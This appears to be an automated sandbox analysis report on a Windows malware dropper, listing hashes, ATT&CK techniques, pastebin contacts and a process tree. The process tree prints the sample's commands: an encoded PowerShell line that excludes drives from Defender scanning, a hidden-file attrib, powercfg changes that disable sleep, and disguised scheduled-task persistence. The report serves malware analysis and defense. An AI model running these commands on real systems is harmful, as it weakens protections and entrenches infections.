f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
13/07/2024, 21:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe
Size

2.5MB
MD5

eb51e8cbb840ace72c5a42d3e0ce2765
SHA1

965d2300cb9627f6605a269dae2f5bc2d7eeeada
SHA256

f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b
SHA512

a578dcc069d55770d24c60aa3540680489ba44a0b4620a742a46fb9ad3085e316914750f15140170cb6fbdff35fec52b83d837d7f34ed9f2562f97214df7490d
SSDEEP

49152:uA5JkHDjz4jI+7tjygzaQBrGpvEOB5fB8ra0bNSzee+h6bLeT1Rh77bRKwzWw:uA5Ojvd+7tpzaIML5cNnjT9R+w

Score

8^/10

execution persistence

Malware Config

Signatures

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation	f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe

Executes dropped EXE 4 IoCs

pid	Process
2272	7z.exe
3484	7z.exe
1584	7z.exe
5116	Installer.exe

Loads dropped DLL 3 IoCs

pid	Process
2272	7z.exe
3484	7z.exe
1584	7z.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
14	pastebin.com
15	pastebin.com

Power Settings 1 TTPs 1 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
752	cmd.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
808	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
772	schtasks.exe
3440	schtasks.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
5116	Installer.exe
808	powershell.exe
808	powershell.exe
5116	Installer.exe
5116	Installer.exe
5116	Installer.exe
5116	Installer.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeRestorePrivilege	2272	7z.exe
Token: 35	2272	7z.exe
Token: SeSecurityPrivilege	2272	7z.exe
Token: SeSecurityPrivilege	2272	7z.exe
Token: SeRestorePrivilege	3484	7z.exe
Token: 35	3484	7z.exe
Token: SeSecurityPrivilege	3484	7z.exe
Token: SeSecurityPrivilege	3484	7z.exe
Token: SeRestorePrivilege	1584	7z.exe
Token: 35	1584	7z.exe
Token: SeSecurityPrivilege	1584	7z.exe
Token: SeSecurityPrivilege	1584	7z.exe
Token: SeDebugPrivilege	5116	Installer.exe
Token: SeDebugPrivilege	808	powershell.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 4876 wrote to memory of 948	4876	f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe	86
PID 4876 wrote to memory of 948	4876	f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe	86
PID 948 wrote to memory of 1776	948	cmd.exe	88
PID 948 wrote to memory of 1776	948	cmd.exe	88
PID 948 wrote to memory of 2272	948	cmd.exe	89
PID 948 wrote to memory of 2272	948	cmd.exe	89
PID 948 wrote to memory of 3484	948	cmd.exe	90
PID 948 wrote to memory of 3484	948	cmd.exe	90
PID 948 wrote to memory of 1584	948	cmd.exe	91
PID 948 wrote to memory of 1584	948	cmd.exe	91
PID 948 wrote to memory of 100	948	cmd.exe	92
PID 948 wrote to memory of 100	948	cmd.exe	92
PID 948 wrote to memory of 5116	948	cmd.exe	93
PID 948 wrote to memory of 5116	948	cmd.exe	93
PID 948 wrote to memory of 5116	948	cmd.exe	93
PID 5116 wrote to memory of 752	5116	Installer.exe	95
PID 5116 wrote to memory of 752	5116	Installer.exe	95
PID 5116 wrote to memory of 752	5116	Installer.exe	95
PID 752 wrote to memory of 808	752	cmd.exe	97
PID 752 wrote to memory of 808	752	cmd.exe	97
PID 752 wrote to memory of 808	752	cmd.exe	97
PID 5116 wrote to memory of 1468	5116	Installer.exe	98
PID 5116 wrote to memory of 1468	5116	Installer.exe	98
PID 5116 wrote to memory of 1468	5116	Installer.exe	98
PID 5116 wrote to memory of 1940	5116	Installer.exe	99
PID 5116 wrote to memory of 1940	5116	Installer.exe	99
PID 5116 wrote to memory of 1940	5116	Installer.exe	99
PID 1468 wrote to memory of 772	1468	cmd.exe	102
PID 1468 wrote to memory of 772	1468	cmd.exe	102
PID 1468 wrote to memory of 772	1468	cmd.exe	102
PID 1940 wrote to memory of 3440	1940	cmd.exe	103
PID 1940 wrote to memory of 3440	1940	cmd.exe	103
PID 1940 wrote to memory of 3440	1940	cmd.exe	103

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
100	attrib.exe

C:\Users\Admin\AppData\Local\Temp\f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe
"C:\Users\Admin\AppData\Local\Temp\f96327b104b6487a604b7b099921eaed35c8bb445534c1a29cd280069653660b.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:948
- - C:\Windows\system32\mode.com
    mode 65,10
    3⤵
    PID:1776
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e file.zip -p2201249071693326612168609430 -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:2272
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_2.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:3484
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_1.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:1584
- - C:\Windows\system32\attrib.exe
    attrib +H "Installer.exe"
    3⤵
    - Views/modifies file attributes
    PID:100
- - C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
    "Installer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5116
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C powershell -EncodedCommand "PAAjAEgARwB1AFMAQwBqAEsAcwB1ADkAQwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQATQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAMQA5AGIAdQAzAGwASwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAyAE8AIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
      4⤵
      Power Settings
      Suspicious use of WriteProcessMemory
      PID:752
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAEgARwB1AFMAQwBqAEsAcwB1ADkAQwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQATQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AHEAMQA5AGIAdQAzAGwASwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAyAE8AIwA+AA=="
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:808
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1468
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:772
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5834" /TR "C:\ProgramData\Dllhost\dllhost.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1940
    - - C:\Windows\SysWOW64\schtasks.exe
        
        SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk5834" /TR "C:\ProgramData\Dllhost\dllhost.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cos3ltke.rf5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

Filesize
2.2MB

MD5
63f1b9d1a36038c8098b5a37efb92741

SHA1
809f30eede4cc79e65531cb853d2b945d021b8bd

SHA256
8f845fb3f73ab9364451d57a7848c2f9085c953f05277309021b094c162d9e8e

SHA512
aaf221581eba802799cdb1e46bd7ba477e330058831080701653815f71b07e735d7d46fc13334f94bb5a2626348078e6db4f813e9c544f63b05ec4b2fdb4e1a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\Installer.exe

Filesize
21KB

MD5
d6eea09bf480e7e8fbbf58b13e124cb5

SHA1
8ad1a6ef15dd14f09c4d1b376ca17ca05823ed5e

SHA256
00e1f6aa291ae8157b7b54b6dc42b3fdb08bac0ce25cd6af8614ba360c0b07b6

SHA512
f3adae262a0d8446be322c4655f79af9ed1705c36caec066178d8e2cbacb89f39cdccfaebaad1958f2f76e0980e43c18d489e6cd2a7bcc80a49dffee9f2e7717

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

Filesize
9KB

MD5
9167575a83ebb373a7b0b38fc2bbefac

SHA1
89473d9b619851d72be027e3290357104b9afdb2

SHA256
dce14b29a6ee1b217c10ff6d9627e5c5f41cfa754ae75e7d31546525510a2ce0

SHA512
105cad3ac67178fa896b37b0254aadb28d50d4b45ea65d01358b557be09cdcefb75a30f5397e3d07876607b754cdc242a880db91abd872a12d565c41808c0911

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

Filesize
1.6MB

MD5
523621a94c9b7ea466517f725b00e2e7

SHA1
3d070c2d26a3b0f122cf4ae2b59b00c6a539b13a

SHA256
3e8daa43074379bf00c81870c27a8e8faf4004452a10a78d0610f49035109907

SHA512
11138df7d8bd1d31af2e5f5bc06c7a75ae2b33d2dce663a8e522f121be3dbc27abaa25289154c219bb52ed35ac5b4bcf1125e5f7071253fd9e06af72e573a61d

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\file.bin

Filesize
1.6MB

MD5
a06f952cc7b13c41b98d4466eaa0e9d2

SHA1
8637be26c64ed09987c6dd924626b8a4c38c4727

SHA256
0b0d8cba1c09dff1977fcfd6b5042e83da702f022322e5b2adf757d33a9ee452

SHA512
f18a5bfa13831f6b1a91cacbb1fa7b37277ae20af824f465dade43c5620690e5ffbcddd34a98569fee187fe517107ccb4dc1bd38386b8cab3f01818df2c95b41

Download Submit
C:\Users\Admin\AppData\Local\Temp\main\main.bat

Filesize
474B

MD5
26b8a6174f1a14c05bbf5e0cfc12ccbf

SHA1
de66142a9bf6b22cd7511e2c9b0c01edafbd7409

SHA256
0880304b10189062193d90d0de8ebfc26a3c1c4962bcee002ca5889dad64797d

SHA512
f758f721bf459858bd614acfe74db97ee399a02a789d3c6faf94c29a5db96e429cfefab3cdbbffabadc3ede98f0af94bf551bd5262eebddb2190151524584506

Download Submit
memory/808-70-0x0000000007480000-0x0000000007523000-memory.dmp

Filesize
652KB

Download
memory/808-59-0x000000006F5D0000-0x000000006F61C000-memory.dmp

Filesize
304KB

Download
memory/808-85-0x0000000007840000-0x0000000007848000-memory.dmp

Filesize
32KB

Download
memory/808-84-0x00000000078F0000-0x000000000790A000-memory.dmp

Filesize
104KB

Download
memory/808-42-0x0000000002CC0000-0x0000000002CF6000-memory.dmp

Filesize
216KB

Download
memory/808-43-0x0000000005400000-0x0000000005A28000-memory.dmp

Filesize
6.2MB

Download
memory/808-44-0x00000000052C0000-0x00000000052E2000-memory.dmp

Filesize
136KB

Download
memory/808-45-0x0000000005AA0000-0x0000000005B06000-memory.dmp

Filesize
408KB

Download
memory/808-83-0x0000000007810000-0x0000000007824000-memory.dmp

Filesize
80KB

Download
memory/808-55-0x0000000005CB0000-0x0000000006004000-memory.dmp

Filesize
3.3MB

Download
memory/808-56-0x0000000006270000-0x000000000628E000-memory.dmp

Filesize
120KB

Download
memory/808-57-0x00000000062C0000-0x000000000630C000-memory.dmp

Filesize
304KB

Download
memory/808-58-0x0000000007440000-0x0000000007472000-memory.dmp

Filesize
200KB

Download
memory/808-82-0x0000000007800000-0x000000000780E000-memory.dmp

Filesize
56KB

Download
memory/808-69-0x0000000006860000-0x000000000687E000-memory.dmp

Filesize
120KB

Download
memory/808-78-0x00000000077C0000-0x00000000077D1000-memory.dmp

Filesize
68KB

Download
memory/808-71-0x0000000007C00000-0x000000000827A000-memory.dmp

Filesize
6.5MB

Download
memory/808-72-0x00000000075C0000-0x00000000075DA000-memory.dmp

Filesize
104KB

Download
memory/808-76-0x0000000007630000-0x000000000763A000-memory.dmp

Filesize
40KB

Download
memory/808-77-0x0000000007850000-0x00000000078E6000-memory.dmp

Filesize
600KB

Download
memory/5116-37-0x00000000000D0000-0x00000000000DC000-memory.dmp

Filesize
48KB

Download
memory/5116-39-0x0000000004AD0000-0x0000000004B62000-memory.dmp

Filesize
584KB

Download
memory/5116-38-0x0000000004FA0000-0x0000000005544000-memory.dmp

Filesize
5.6MB

Download
memory/5116-41-0x0000000004D00000-0x0000000004D66000-memory.dmp

Filesize
408KB

Download
memory/5116-40-0x0000000004C70000-0x0000000004C7A000-memory.dmp

Filesize
40KB

Download